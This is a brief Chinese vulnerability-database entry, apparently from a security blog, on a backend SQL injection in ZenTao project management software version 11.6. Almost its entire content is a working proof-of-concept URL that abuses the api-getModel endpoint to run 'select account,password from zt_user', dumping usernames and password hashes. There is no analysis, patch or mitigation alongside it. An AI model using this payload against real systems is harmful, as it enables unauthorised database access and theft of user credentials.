禅道11.6后台SQL注入


title: ‘禅道11.6后台SQL注入’
date: Thu, 17 Sep 2020 01:28:13 +0000
draft: false
tags: [‘白阁-漏洞库’]

### 影响范围

禅道 11.6

### 漏洞POC

Payload:

http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

![img](/static/baige/01-CMS漏洞/禅道/禅道11.6后台SQL注入/20200909170607989.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容